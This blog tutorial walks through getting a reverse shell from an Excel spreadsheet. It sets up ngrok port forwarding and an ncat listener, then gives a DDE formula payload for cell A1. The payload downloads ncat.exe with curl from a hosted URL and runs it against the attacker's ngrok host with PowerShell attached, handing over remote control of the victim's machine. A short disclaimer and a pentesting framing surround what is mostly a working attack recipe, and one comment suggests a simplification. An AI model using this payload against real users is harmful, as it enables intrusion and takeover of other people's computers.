Ads Area

Reverse Shell using Excel

Hi Guys, Welcome back to another Blog. I hope you all would be fine :)

Today's Blog is at most related to our previous blog which was about to
* Get Reverse Shell from Word Documents

In this blog, we are going to perform the same task but this time we would be using up excel rather than Word. But, before we get into its setup, let me warn you that the knowledge you get must never be used to inflict harm to an individual or an organization, and if that happens, we (thedecentshub) will not be held liable.

Lab Environment Configu


So without wasting any further time let's start...




* Lab Environment Configuration

We will be performing all the reverse shell accessor tasks on the Kali Linux Machine and the provider part(the person providing up the reverse Shell) would be using up the Windows environment to access up the Microsoft Excel( this is a must requirement because it allows us to successfully execute Macros

* Pre-requisites for this task

First, we will be using up the * Ngrok Server * for port forwarding which will provide us with the public identity to our private localhost environment. If you want to know how to set up the Particular Ngrok Server you can check this full video tutorial - Setup the Ngrok Server by Clicking on me!

The second thing we need to set up is the * Ncat tool * to build up the TCP Connection between two computers. We will be designing up a payload that will totally work on Ncat for the reverse Shell procedure.

The third thing in demand is an online free file hosting service where we will host up our Ncat.exe file so that we can provide the URL in our payload and can remove the dependency of this particular Software on the Client Side.

So let's begin :


STEP1: So guys first, we will be forwarding our port using Ngrok Server. Since we want to build TCP Connection between two different PCs we will forward our TCP Port.

For doing it we need to type the command -

./ngrok tcp (for eg: port) 1234



It will forward your Port something like this and will provide a public identity to your private domain.



STEP2: Now guys, you need to use the Ncat tool to open up a listener where you will be provided up with the reverse shell.

Use command - ncat -nvlp 1234(port must be the same as provided in the Ngrok).
If an error comes like that is not installed install it using
In Kali - *sudo apt install ncat 






STEP3: After the listener being opened, we will move to our Excel Payload.
In the shell A1 of our excel sheet, we need to type the given payload-

=cmd| '/C curl -v [URL/path of the ncat.exe hosted online] --output ncat.exe'!nm.A1&cmd| '/C ncat.exe Ngrok HOST Ngrok Port -e powershell.exe'!nm.A1

First let me tell you about the curl command used above, with that curl command our intention is to download the ncat.exe file on the provider's system so that no sort of dependency remains now.

Next, we have provided up the Ncat Command to build the TCP Connection and to provide the PowerShell as a reverse shell to the accessor's PC where the listener is opened.


So finally guys either after saving the file and opening it or executing the macro directly you get the reverse shell to the provider's PC.

But guys, in this case, you get a serious warning from Excel that it's your consent/will to execute this payload. Since anything can be malicious if not taken care of.


The act I demonstrated to you is only for PenTesting Purpose as sometimes due to weak input validation files may contain these sorts of payloads which can cause great loss of data/integrity when executed. So we must properly need to validate all the things and must make sure everything passes after proper encryption and validation.

I have also created up a video on the same topic. If u have any doubts related to the Blog, u can also refer to the below provided YouTube video link -



So Guys, this much for this blog, if you like the content you can follow me up, can also subscribe to my YouTube channel. If you Guys want that I keep bringing this sort of Bogs and videos for you, you can show your support to me ...

Buy me a coffee and show your Support 😊 ----- PayPal ID - https://www.paypal.me/agthecoder UPI ID- apoorvgupta@kotak

Till Next Blog Guys, *TaTa*, Goodbye. I hope you enjoyed the Blog 😊

Tags
The Decent's Blog

The Decent's Blog

Hi there, I'm Apoorv Gupta - aka Agisthemantobeat �� I'm a Senior Software Engineer, WhiteHat Hacker, Developer, and Youtuber!! | ⚡ Fun fact: I love to learn everything and solve problems of people. A small zest of Certifications - NSE1, NSE2 (Network Security Associate), CSFPC, Microsoft AI-900, DP-900 and rest on my LinkedIn profile.

Post a Comment

3 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
  1. Supriya RastogiAugust 23, 2021 at 12:07 AM

    Great blog, really helpful!! Thanks!!

    ReplyDelete
  2. AnonymousOctober 10, 2023 at 9:15 AM

    You are already getting a URL from ngrok so you don't need to sign up for any free service to host the ncat file. Ngrok has an option for you to be able to host something.

    ReplyDelete